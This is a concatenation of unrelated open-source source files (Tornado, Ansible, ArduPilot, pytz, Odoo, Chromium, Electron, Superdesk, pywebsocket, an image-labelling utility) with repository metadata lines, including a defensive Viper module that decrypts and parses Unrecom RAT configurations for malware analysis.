# License for the specific language governing permissions and limitations
# under the License.
"""A non-blocking, single-threaded TCP server."""
from __future__ import absolute_import, division, print_function, with_statement
import errno
import os
import socket
from tornado.log import app_log
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream, SSLIOStream
from tornado.netutil import bind_sockets, add_accept_handler, ssl_wrap_socket
from tornado import process
from tornado.util import errno_from_exception
try:
import ssl
except ImportError:
# ssl is not available on Google App Engine.
ssl = None
class TCPServer(object):
r"""A non-blocking, single-threaded TCP server.
To use `TCPServer`, define a subclass which overrides the `handle_stream`
method.
To make this server serve SSL traffic, send the ssl_options dictionary
argument with the arguments required for the `ssl.wrap_socket` method,
including "certfile" and "keyfile"::
TCPServer(ssl_options={
"certfile": os.path.join(data_dir, "mydomain.crt"),
"keyfile": os.path.join(data_dir, "mydomain.key"),
})
`TCPServer` initialization follows one of three patterns:
1. `listen`: simple single-process::
server = TCPServer()
server.listen(8888)
IOLoop.instance().start()
2. `bind`/`start`: simple multi-process::
server = TCPServer()
server.bind(8888)
server.start(0) # Forks multiple sub-processes
IOLoop.instance().start()
When using this interface, an `.IOLoop` must *not* be passed
to the `TCPServer` constructor. `start` will always start
the server on the default singleton `.IOLoop`.
3. `add_sockets`: advanced multi-process::
sockets = bind_sockets(8888)
tornado.process.fork_processes(0)
server = TCPServer()
server.add_sockets(sockets)
IOLoop.instance().start()
The `add_sockets` interface is more complicated, but it can be
used with `tornado.process.fork_processes` to give you more
flexibility in when the fork happens. `add_sockets` can
also be used in single-process servers if you want to create
your listening sockets in some way other than
`~tornado.netutil.bind_sockets`.
.. versionadded:: 3.1
The ``max_buffer_size`` argument.
"""
def __init__(self, io_loop=None, ssl_options=None, max_buffer_size=None,
read_chunk_size=None):
self.io_loop = io_loop
self.ssl_options = ssl_options
self._sockets = {} # fd -> socket object
self._pending_sockets = []
self._started = False
self.max_buffer_size = max_buffer_size
self.read_chunk_size = None
# Verify the SSL options. Otherwise we don't get errors until clients
# connect. This doesn't verify that the keys are legitimate, but
# the SSL module doesn't do that until there is a connected socket
# which seems like too much work
if self.ssl_options is not None and isinstance(self.ssl_options, dict):
# Only certfile is required: it can contain both keys
if 'certfile' not in self.ssl_options:
raise KeyError('missing key "certfile" in ssl_options')
if not os.path.exists(self.ssl_options['certfile']):
raise ValueError('certfile "%s" does not exist' %
self.ssl_options['certfile'])
if ('keyfile' in self.ssl_options and
not os.path.exists(self.ssl_options['keyfile'])):
raise ValueError('keyfile "%s" does not exist' %
self.ssl_options['keyfile'])
def listen(self, port, address=""):
"""Starts accepting connections on the given port.
This method may be called more than once to listen on multiple ports.
`listen` takes effect immediately; it is not necessary to call
`TCPServer.start` afterwards. It is, however, necessary to start
the `.IOLoop`.
"""
sockets = bind_sockets(port, address=address)
self.add_sockets(sockets)
def add_sockets(self, sockets):
"""Makes this server start accepting connections on the given sockets.
The ``sockets`` parameter is a list of socket objects such as
those returned by `~tornado.netutil.bind_sockets`.
`add_sockets` is typically used in combination with that
method and `tornado.process.fork_processes` to provide greater
control over the initialization of a multi-process server.
"""
if self.io_loop is None:
self.io_loop = IOLoop.current()
for sock in sockets:
self._sockets[sock.fileno()] = sock
add_accept_handler(sock, self._handle_connection,
io_loop=self.io_loop)
def add_socket(self, socket):
"""Singular version of `add_sockets`. Takes a single socket object."""
self.add_sockets([socket])
def bind(self, port, address=None, family=socket.AF_UNSPEC, backlog=128):
"""Binds this server to the given port on the given address.
To start the server, call `start`. If you want to run this server
in a single process, you can call `listen` as a shortcut to the
sequence of `bind` and `start` calls.
Address may be either an IP address or hostname. If it's a hostname,
the server will listen on all IP addresses associated with the
name. Address may be an empty string or None to listen on all
available interfaces. Family may be set to either `socket.AF_INET`
or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
both will be used if available.
The ``backlog`` argument has the same meaning as for
`socket.listen <socket.socket.listen>`.
This method may be called multiple times prior to `start` to listen
on multiple ports or interfaces.
"""
sockets = bind_sockets(port, address=address, family=family,
backlog=backlog)
if self._started:
self.add_sockets(sockets)
else:
self._pending_sockets.extend(sockets)
def start(self, num_processes=1):
"""Starts this server in the `.IOLoop`.
By default, we run the server in this process and do not fork any
additional child process.
If num_processes is ``None`` or <= 0, we detect the number of cores
available on this machine and fork that number of child
processes. If num_processes is given and > 1, we fork that
specific number of sub-processes.
Since we use processes and not threads, there is no shared memory
between any server code.
Note that multiple processes are not compatible with the autoreload
module (or the ``autoreload=True`` option to `tornado.web.Application`
which defaults to True when ``debug=True``).
When using multiple processes, no IOLoops can be created or
referenced until after the call to ``TCPServer.start(n)``.
"""
assert not self._started
self._started = True
if num_processes != 1:
process.fork_processes(num_processes)
sockets = self._pending_sockets
self._pending_sockets = []
self.add_sockets(sockets)
def stop(self):
"""Stops listening for new connections.
Requests currently in progress may still continue after the
server is stopped.
"""
for fd, sock in self._sockets.items():
self.io_loop.remove_handler(fd)
sock.close()
def handle_stream(self, stream, address):
"""Override to handle a new `.IOStream` from an incoming connection."""
raise NotImplementedError()
def _handle_connection(self, connection, address):
if self.ssl_options is not None:
assert ssl, "Python 2.6+ and OpenSSL required for SSL"
try:
connection = ssl_wrap_socket(connection,
self.ssl_options,
server_side=True,
do_handshake_on_connect=False)
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_EOF:
return connection.close()
else:
raise
except socket.error as err:
# If the connection is closed immediately after it is created
# (as in a port scan), we can get one of several errors.
# wrap_socket makes an internal call to getpeername,
# which may return either EINVAL (Mac OS X) or ENOTCONN
# (Linux). If it returns ENOTCONN, this error is
# silently swallowed by the ssl module, so we need to
# catch another error later on (AttributeError in
# SSLIOStream._do_ssl_handshake).
# To test this behavior, try nmap with the -sT flag.
# https://github.com/tornadoweb/tornado/pull/750
if errno_from_exception(err) in (errno.ECONNABORTED, errno.EINVAL):
return connection.close()
else:
raise
try:
if self.ssl_options is not None:
stream = SSLIOStream(connection, io_loop=self.io_loop,
max_buffer_size=self.max_buffer_size,
read_chunk_size=self.read_chunk_size)
else:
stream = IOStream(connection, io_loop=self.io_loop,
max_buffer_size=self.max_buffer_size,
read_chunk_size=self.read_chunk_size)
self.handle_stream(stream, address)
except Exception:
app_log.error("Error in connection callback", exc_info=True)
| apache-2.0 |
alexlo03/ansible | lib/ansible/modules/windows/win_route.py | 21 | 1660 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Daniele Lazzari <lazzari@mailup.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# This is a windows documentation stub. Actual code lives in the .ps1
# file of the same name.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_route
version_added: "2.4"
short_description: Add or remove a static route
description:
- Add or remove a static route.
options:
destination:
description:
- Destination IP address in CIDR format (ip address/prefix length)
required: yes
gateway:
description:
- The gateway used by the static route.
- If C(gateway) is not provided it will be set to C(0.0.0.0).
metric:
description:
- Metric used by the static route.
type: int
default: 1
state:
description:
- If C(absent), it removes a network static route.
- If C(present), it adds a network static route.
choices: [ absent, present ]
default: present
notes:
- Works only with Windows 2012 R2 and newer.
author:
- Daniele Lazzari
'''
EXAMPLES = r'''
---
- name: Add a network static route
win_route:
destination: 192.168.2.10/32
gateway: 192.168.1.1
metric: 1
state: present
- name: Remove a network static route
win_route:
destination: 192.168.2.10/32
state: absent
'''
RETURN = r'''
output:
description: A message describing the task result.
returned: always
type: string
sample: "Route added"
'''
| gpl-3.0 |
kellyschrock/ardupilot | Tools/scripts/configure_all.py | 4 | 2215 | #!/usr/bin/env python
"""
script to run configre for all hwdef.dat, to check for syntax errors
"""
import os
import shutil
import subprocess
import sys
import fnmatch
import argparse
parser = argparse.ArgumentParser(description='configure all ChibiOS boards')
parser.add_argument('--build', action='store_true', default=False, help='build as well as configure')
parser.add_argument('--stop', action='store_true', default=False, help='stop on build fail')
parser.add_argument('--pattern', default='*')
args = parser.parse_args()
os.environ['PYTHONUNBUFFERED'] = '1'
failures = []
def get_board_list():
'''add boards based on existance of hwdef-bl.dat in subdirectories for ChibiOS'''
board_list = []
dirname, dirlist, filenames = next(os.walk('libraries/AP_HAL_ChibiOS/hwdef'))
for d in dirlist:
hwdef = os.path.join(dirname, d, 'hwdef.dat')
if os.path.exists(hwdef):
board_list.append(d)
return board_list
def run_program(cmd_list, build):
print("Running (%s)" % " ".join(cmd_list))
retcode = subprocess.call(cmd_list)
if retcode != 0:
print("Build failed: %s %s" % (build, ' '.join(cmd_list)))
global failures
failures.append(build)
if args.stop:
sys.exit(1)
for board in get_board_list():
if not fnmatch.fnmatch(board, args.pattern):
continue
print("Configuring for %s" % board)
run_program(["./waf", "configure", "--board", board], "configure: " + board)
if args.build:
if board == "iomcu":
target = "iofirmware"
else:
target = "copter"
run_program(["./waf", target], "build: " + board)
# check for bootloader def
hwdef_bl = os.path.join('libraries/AP_HAL_ChibiOS/hwdef/%s/hwdef-bl.dat' % board)
if os.path.exists(hwdef_bl):
print("Configuring bootloader for %s" % board)
run_program(["./waf", "configure", "--board", board, "--bootloader"], "configure: " + board + "-bl")
if args.build:
run_program(["./waf", "bootloader"], "build: " + board + "-bl")
if len(failures) > 0:
print("Failed builds:")
for f in failures:
print(' ' + f)
sys.exit(1)
sys.exit(0)
| gpl-3.0 |
kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/pytz/lazy.py | 514 | 5263 | from threading import RLock
try:
from UserDict import DictMixin
except ImportError:
from collections import Mapping as DictMixin
# With lazy loading, we might end up with multiple threads triggering
# it at the same time. We need a lock.
_fill_lock = RLock()
class LazyDict(DictMixin):
"""Dictionary populated on first use."""
data = None
def __getitem__(self, key):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return self.data[key.upper()]
def __contains__(self, key):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return key in self.data
def __iter__(self):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return iter(self.data)
def __len__(self):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return len(self.data)
def keys(self):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return self.data.keys()
class LazyList(list):
"""List populated on first use."""
_props = [
'__str__', '__repr__', '__unicode__',
'__hash__', '__sizeof__', '__cmp__',
'__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',
'append', 'count', 'index', 'extend', 'insert', 'pop', 'remove',
'reverse', 'sort', '__add__', '__radd__', '__iadd__', '__mul__',
'__rmul__', '__imul__', '__contains__', '__len__', '__nonzero__',
'__getitem__', '__setitem__', '__delitem__', '__iter__',
'__reversed__', '__getslice__', '__setslice__', '__delslice__']
def __new__(cls, fill_iter=None):
if fill_iter is None:
return list()
# We need a new class as we will be dynamically messing with its
# methods.
class LazyList(list):
pass
fill_iter = [fill_iter]
def lazy(name):
def _lazy(self, *args, **kw):
_fill_lock.acquire()
try:
if len(fill_iter) > 0:
list.extend(self, fill_iter.pop())
for method_name in cls._props:
delattr(LazyList, method_name)
finally:
_fill_lock.release()
return getattr(list, name)(self, *args, **kw)
return _lazy
for name in cls._props:
setattr(LazyList, name, lazy(name))
new_list = LazyList()
return new_list
# Not all versions of Python declare the same magic methods.
# Filter out properties that don't exist in this version of Python
# from the list.
LazyList._props = [prop for prop in LazyList._props if hasattr(list, prop)]
class LazySet(set):
"""Set populated on first use."""
_props = (
'__str__', '__repr__', '__unicode__',
'__hash__', '__sizeof__', '__cmp__',
'__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',
'__contains__', '__len__', '__nonzero__',
'__getitem__', '__setitem__', '__delitem__', '__iter__',
'__sub__', '__and__', '__xor__', '__or__',
'__rsub__', '__rand__', '__rxor__', '__ror__',
'__isub__', '__iand__', '__ixor__', '__ior__',
'add', 'clear', 'copy', 'difference', 'difference_update',
'discard', 'intersection', 'intersection_update', 'isdisjoint',
'issubset', 'issuperset', 'pop', 'remove',
'symmetric_difference', 'symmetric_difference_update',
'union', 'update')
def __new__(cls, fill_iter=None):
if fill_iter is None:
return set()
class LazySet(set):
pass
fill_iter = [fill_iter]
def lazy(name):
def _lazy(self, *args, **kw):
_fill_lock.acquire()
try:
if len(fill_iter) > 0:
for i in fill_iter.pop():
set.add(self, i)
for method_name in cls._props:
delattr(LazySet, method_name)
finally:
_fill_lock.release()
return getattr(set, name)(self, *args, **kw)
return _lazy
for name in cls._props:
setattr(LazySet, name, lazy(name))
new_set = LazySet()
return new_set
# Not all versions of Python declare the same magic methods.
# Filter out properties that don't exist in this version of Python
# from the list.
LazySet._props = [prop for prop in LazySet._props if hasattr(set, prop)]
| gpl-3.0 |
lynndotconfig/server-tools | language_path_mixin/__openerp__.py | 13 | 1370 | # -*- coding: utf-8 -*-
##############################################################################
#
# Odoo, an open source suite of business apps
# This module copyright (C) 2015 Therp BV (<http://therp.nl>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Language path mixin',
'summary': "Setting the partner's language in RML reports",
'version': '1.0',
'author': 'Therp BV,Odoo Community Association (OCA)',
'maintainer': 'Odoo Community Association (OCA)',
'website': 'https://github.com/OCA/server-tools',
'license': 'AGPL-3',
'category': 'Tools',
'depends': [
'base',
],
}
| agpl-3.0 |
Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/tools/findit/match_set.py | 48 | 4429 | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
from threading import Lock
import crash_utils
REVIEW_URL_PATTERN = re.compile(r'Review URL:( *)(.*?)/(\d+)')
class Match(object):
"""Represents a match entry.
A match is a CL that is suspected to have caused the crash. A match object
contains information about files it changes, their authors, etc.
Attributes:
is_revert: True if this CL is reverted by other CL.
revert_of: If this CL is a revert of some other CL, a revision number/
git hash of that CL.
crashed_line_numbers: The list of lines that caused crash for this CL.
function_list: The list of functions that caused the crash.
min_distance: The minimum distance between the lines that CL changed and
lines that caused the crash.
changed_files: The list of files that the CL changed.
changed_file_urls: The list of URLs for the file.
author: The author of the CL.
component_name: The name of the component that this CL belongs to.
stack_frame_indices: For files that caused crash, list of where in the
stackframe they occur.
priorities: A list of priorities for each of the changed file. A priority
is 1 if the file changes a crashed line, and 2 if it changes
the file but not the crashed line.
reivision_url: The revision URL of the CL.
review_url: The codereview URL that reviews this CL.
reviewers: The list of people that reviewed this CL.
reason: The reason why this CL is suspected.
time: When this CL was committed.
"""
REVERT_PATTERN = re.compile(r'(revert\w*) r?(\d+)', re.I)
def __init__(self, revision, component_name):
self.is_revert = False
self.revert_of = None
self.message = None
self.crashed_line_numbers = []
self.function_list = []
self.min_distance = crash_utils.INFINITY
self.min_distance_info = None
self.changed_files = []
self.changed_file_urls = []
self.author = revision['author']
self.component_name = component_name
self.stack_frame_indices = []
self.priorities = []
self.revision_url = revision['url']
self.review_url = ''
self.reviewers = []
self.reason = None
self.time = revision['time']
def ParseMessage(self, message, codereview_api_url):
"""Parses the message.
It checks the message to extract the code review website and list of
reviewers, and it also checks if the CL is a revert of another CL.
Args:
message: The message to parse.
codereview_api_url: URL to retrieve codereview data from.
"""
self.message = message
for line in message.splitlines():
line = line.strip()
review_url_line_match = REVIEW_URL_PATTERN.match(line)
# Check if the line has the code review information.
if review_url_line_match:
# Get review number for the code review site from the line.
issue_number = review_url_line_match.group(3)
# Get JSON from the code review site, ignore the line if it fails.
url = codereview_api_url % issue_number
json_string = crash_utils.GetDataFromURL(url)
if not json_string:
continue
# Load the JSON from the string, and get the list of reviewers.
code_review = crash_utils.LoadJSON(json_string)
if code_review:
self.reviewers = code_review['reviewers']
# Check if this CL is a revert of other CL.
if line.lower().startswith('revert'):
self.is_revert = True
# Check if the line says what CL this CL is a revert of.
revert = self.REVERT_PATTERN.match(line)
if revert:
self.revert_of = revert.group(2)
return
class MatchSet(object):
"""Represents a set of matches.
Attributes:
matches: A map from CL to a match object.
cls_to_ignore: A set of CLs to ignore.
matches_lock: A lock guarding matches dictionary.
"""
def __init__(self, codereview_api_url):
self.codereview_api_url = codereview_api_url
self.matches = {}
self.cls_to_ignore = set()
self.matches_lock = Lock()
def RemoveRevertedCLs(self):
"""Removes CLs that are revert."""
for cl in self.matches:
if cl in self.cls_to_ignore:
del self.matches[cl]
| mit |
dongjoon-hyun/electron | script/update.py | 18 | 3148 | #!/usr/bin/env python
import argparse
import os
import platform
import subprocess
import sys
from lib.config import get_target_arch, PLATFORM
from lib.util import get_host_arch, import_vs_env
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
def main():
os.chdir(SOURCE_ROOT)
if PLATFORM != 'win32' and platform.architecture()[0] != '64bit':
print 'Electron is required to be built on a 64bit machine'
return 1
update_external_binaries()
return update_gyp()
def parse_args():
parser = argparse.ArgumentParser(description='Update build configurations')
parser.add_argument('--defines', default='',
help='The build variables passed to gyp')
parser.add_argument('--msvs', action='store_true',
help='Generate Visual Studio project')
return parser.parse_args()
def update_external_binaries():
uf = os.path.join('script', 'update-external-binaries.py')
subprocess.check_call([sys.executable, uf])
def update_gyp():
# Since gyp doesn't support specify link_settings for each configuration,
# we are not able to link to different libraries in "Debug" and "Release"
# configurations.
# In order to work around this, we decided to generate the configuration
# for twice, one is to generate "Debug" config, the other one to generate
# the "Release" config. And the settings are controlled by the variable
# "libchromiumcontent_component" which is defined before running gyp.
target_arch = get_target_arch()
return (run_gyp(target_arch, 0) or run_gyp(target_arch, 1))
def run_gyp(target_arch, component):
# Update the VS build env.
import_vs_env(target_arch)
env = os.environ.copy()
if PLATFORM == 'linux' and target_arch != get_host_arch():
env['GYP_CROSSCOMPILE'] = '1'
elif PLATFORM == 'win32':
env['GYP_MSVS_VERSION'] = '2015'
python = sys.executable
if sys.platform == 'cygwin':
# Force using win32 python on cygwin.
python = os.path.join('vendor', 'python_26', 'python.exe')
gyp = os.path.join('vendor', 'brightray', 'vendor', 'gyp', 'gyp_main.py')
gyp_pylib = os.path.join(os.path.dirname(gyp), 'pylib')
# Avoid using the old gyp lib in system.
env['PYTHONPATH'] = os.path.pathsep.join([gyp_pylib,
env.get('PYTHONPATH', '')])
# Whether to build for Mac App Store.
if os.environ.has_key('MAS_BUILD'):
mas_build = 1
else:
mas_build = 0
defines = [
'-Dlibchromiumcontent_component={0}'.format(component),
'-Dtarget_arch={0}'.format(target_arch),
'-Dhost_arch={0}'.format(get_host_arch()),
'-Dlibrary=static_library',
'-Dmas_build={0}'.format(mas_build),
]
# Add the defines passed from command line.
args = parse_args()
for define in [d.strip() for d in args.defines.split(' ')]:
if define:
defines += ['-D' + define]
generator = 'ninja'
if args.msvs:
generator = 'msvs-ninja'
return subprocess.call([python, gyp, '-f', generator, '--depth', '.',
'electron.gyp', '-Icommon.gypi'] + defines, env=env)
if __name__ == '__main__':
sys.exit(main())
| mit |
superdesk/superdesk-content-api | content_api/tests/packages_init_app_test.py | 13 | 2280 | # -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014, 2015 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
from unittest import mock
from unittest.mock import MagicMock
from content_api.tests import ApiTestCase
_fake_packages_resource = MagicMock()
_fake_packages_service = MagicMock()
_fake_backend = MagicMock(name='superdesk backend')
def _fake_get_backend():
"""Return mocked superdesk backend."""
return _fake_backend
class FakePackagesService():
def __init__(self, datasource, backend=None):
self.datasource = datasource
self.backend = backend
def __eq__(self, other):
return (
self.datasource == other.datasource and
self.backend is other.backend
)
def __ne__(self, other):
return not self.__eq__(other)
@mock.patch('content_api.packages.PackagesResource', _fake_packages_resource)
@mock.patch('content_api.packages.PackagesService', FakePackagesService)
@mock.patch('superdesk.get_backend', _fake_get_backend)
class ItemsInitAppTestCase(ApiTestCase):
"""Base class for the `items.init_app` function tests."""
def _get_target_function(self):
"""Return the function under test.
Make the test fail immediately if the function cannot be imported.
"""
try:
from content_api.packages import init_app
except ImportError:
self.fail("Could not import function under test (init_app).")
else:
return init_app
def test_instantiates_packages_resource_with_correct_arguments(self):
fake_app = MagicMock(name='app')
fake_packages_service = FakePackagesService('packages', _fake_get_backend())
init_app = self._get_target_function()
init_app(fake_app)
self.assertTrue(_fake_packages_resource.called)
args, kwargs = _fake_packages_resource.call_args
self.assertTrue(len(args) > 0 and args[0] == 'packages')
self.assertIs(kwargs.get('app'), fake_app)
self.assertEqual(kwargs.get('service'), fake_packages_service)
| agpl-3.0 |
jahrome/viper | modules/rats/unrecom.py | 6 | 2755 | # Originally written by Kevin Breen (@KevTheHermit):
# https://github.com/kevthehermit/RATDecoders/blob/master/unrecom.py
import string
from zipfile import ZipFile
from cStringIO import StringIO
from Crypto.Cipher import ARC4
import xml.etree.ElementTree as ET
from viper.common.out import *
def extract_embedded(zip_data):
raw_embedded = None
archive = StringIO(zip_data)
with ZipFile(archive) as zip:
for name in zip.namelist(): # get all the file names
if name == "load/ID": # contains first part of key
partial_key = zip.read(name)
enckey = partial_key + 'DESW7OWKEJRU4P2K' # complete key
print_info("Encryption Key {0}".format(zip.read(name)))
if name == "load/MANIFEST.MF": # this is the embedded jar
raw_embedded = zip.read(name)
if raw_embedded != None:
# Decrypt The raw file
dec_embedded = decrypt_arc4(enckey, raw_embedded)
return dec_embedded
else:
return None
def parse_embedded(data):
newzipdata = data
newZip = StringIO(newzipdata) # Write new zip file to memory instead of to disk
with ZipFile(newZip) as zip:
for name in zip.namelist():
if name == "config.xml": # this is the config in clear
config = zip.read(name)
return config
def decrypt_arc4(enckey, data):
cipher = ARC4.new(enckey) # set the ciper
return cipher.decrypt(data) # decrpyt the data
def parse_config(config):
#try:
xml = filter(lambda x: x in string.printable, config)
root = ET.fromstring(xml)
raw_config = {}
for child in root:
if child.text.startswith("Unrecom"):
raw_config["Version"] = child.text
else:
raw_config[child.attrib["key"]] = child.text
new_config = {}
new_config['Version'] = raw_config['Version']
new_config['Delay'] = raw_config['delay']
new_config['Domain'] = raw_config['dns']
new_config['Extension'] = raw_config['extensionname']
new_config['Install'] = raw_config['install']
new_config['Port1'] = raw_config['p1']
new_config['Port2'] = raw_config['p2']
new_config['Password'] = raw_config['password']
new_config['PluginFolder'] = raw_config['pluginfoldername']
new_config['Prefix'] = raw_config['prefix']
return new_config
#except:
#return None
def config(data):
embedded = extract_embedded(data)
if embedded is not None:
config = parse_embedded(embedded)
else:
return None
if config is not None:
return parse_config(config)
else:
return None
| bsd-3-clause |
kirca/odoo | addons/point_of_sale/wizard/pos_box.py | 381 | 2211 |
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.addons.account.wizard.pos_box import CashBox
class PosBox(CashBox):
_register = False
def run(self, cr, uid, ids, context=None):
if not context:
context = dict()
active_model = context.get('active_model', False) or False
active_ids = context.get('active_ids', []) or []
if active_model == 'pos.session':
records = self.pool[active_model].browse(cr, uid, active_ids, context=context)
bank_statements = [record.cash_register_id for record in records if record.cash_register_id]
if not bank_statements:
raise osv.except_osv(_('Error!'),
_("There is no cash register for this PoS Session"))
return self._run(cr, uid, ids, bank_statements, context=context)
else:
return super(PosBox, self).run(cr, uid, ids, context=context)
class PosBoxIn(PosBox):
_inherit = 'cash.box.in'
def _compute_values_for_statement_line(self, cr, uid, box, record, context=None):
if context is None:
context = {}
values = super(PosBoxIn, self)._compute_values_for_statement_line(cr, uid, box, record, context=context)
active_model = context.get('active_model', False) or False
active_ids = context.get('active_ids', []) or []
if active_model == 'pos.session':
session = self.pool[active_model].browse(cr, uid, active_ids, context=context)[0]
values['ref'] = session.name
return values
class PosBoxOut(PosBox):
_inherit = 'cash.box.out'
def _compute_values_for_statement_line(self, cr, uid, box, record, context=None):
values = super(PosBoxOut, self)._compute_values_for_statement_line(cr, uid, box, record, context=context)
active_model = context.get('active_model', False) or False
active_ids = context.get('active_ids', []) or []
if active_model == 'pos.session':
session = self.pool[active_model].browse(cr, uid, active_ids, context=context)[0]
values['ref'] = session.name
return values
| agpl-3.0 |
srm912/servo | tests/wpt/css-tests/tools/pywebsocket/src/test/set_sys_path.py | 496 | 1815 | # Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Configuration for testing.
Test files should import this module before mod_pywebsocket.
"""
import os
import sys
# Add the parent directory to sys.path to enable importing mod_pywebsocket.
sys.path.insert(0, os.path.join(os.path.split(__file__)[0], '..'))
# vi:sts=4 sw=4 et
| mpl-2.0 |
CUFCTL/DLBD | Spring2018/src/utils.py | 1 | 16622 | ### Import necessary packages
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from xml.etree import ElementTree as et
import cv2, os, sys, shutil, glob, argparse, re, io
import numpy as np
import tensorflow as tf
import PIL, hashlib, logging
from PIL import Image
from lxml import etree
from halo import Halo
from object_detection.utils import dataset_util
from object_detection.utils import label_map_util
RED = (0, 0, 255)
LWIDTH = 2
### Visualization Utilities
def get_bb(xml_file):
"""
Read the XML file and get ground truth bounding box
coordinates.
Parameters:
xml_file - file containing label information
Returns:
tuple - (xmin, xmax, ymin, ymax)
"""
# Open the XML file and parse the tree
with open(xml_file) as xf:
tree = et.parse(xf)
# Look for specific nodes and place into the tuple
xmin, xmax, ymin, ymax = None, None, None, None
for node in tree.iter():
if node.tag == 'xmin': xmin = int(node.text)
if node.tag == 'xmax': xmax = int(node.text)
if node.tag == 'ymin': ymin = int(node.text)
if node.tag == 'ymax': ymax = int(node.text)
return (xmin, xmax, ymin, ymax)
def draw_bb(img_path, oimg_path):
"""
Draw bounding box on the give image and write to new image.
NOTE: Assumes corresponding JPG and XML in same directory.
Parameters:
img_path - original image path
bb - tuple containing bounding box
oimg_path - output image path
Returns:
None
"""
# Make sure output directory has been created
out_path = oimg_path.split('/')[:-1]
out_path = os.path.join('/', *out_path)
if not os.path.exists(out_path):
os.makedirs(out_path)
# Read input image
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
# Check to see if corresponding XML file (label) exists
xml_path = img_path.split('.')[0] + '.xml'
if not os.path.isfile(xml_path):
cv2.imwrite(oimg_path, img)
return
# Get bounding boxes from corresponding file
xmin, xmax, ymin, ymax = get_bb(xml_path)
if xmin == None or xmax == None or ymin == None or ymax == None:
# Write output image without box
cv2.imwrite(oimg_path, img)
return
# Draw bounding box on image
cv2.rectangle(img, (xmin, ymin), (xmax, ymax), RED, LWIDTH)
# Write output image
cv2.imwrite(oimg_path, img)
### XML Utilities
def read_ci_xml(ci_xml, type_data):
"""
Read XML tree structure from CI XML file
Parameters:
ci_xml - XML file in CI format
type_data - 13-class or 100-class
Returns:
folder - directory where image is located
filename - name of corresponding image
database - database name
width - image width
height - image height
name - class name of object
xmax - bottom right x coordinate
xmin - top left x coordinate
ymax - bottom right y coordinate
ymin - top left y coordinate
"""
ci_tree = etree.parse(ci_xml)
root = ci_tree.getroot()
folder, filename, database = '', '', ''
name, width, height = '', '', ''
xmax, xmin, ymax, ymin = '', '', '', ''
for child in root:
if child.tag == 'folder':
folder = child.text
if child.tag == 'filename':
if child.text.split('.') == 'jpg':
filename = child.text
else:
filename = child.text + '.jpg'
if child.tag == 'source':
for child2 in child:
if child2.tag == 'database':
database = child2.text
if child.tag == 'size':
for child2 in child:
if child2.tag == 'width':
width = child2.text
if child2.tag == 'height':
height = child2.text
if child.tag == 'object':
for child2 in child:
if child2.tag == 'name':
if type_data == 13:
name = re.split(r'(\d+)', child2.text)[0]
else:
name = child2.text
if child2.tag == 'bndbox':
for child3 in child2:
if child3.tag == 'xmax':
xmax = child3.text
if child3.tag == 'xmin':
xmin = child3.text
if child3.tag == 'ymax':
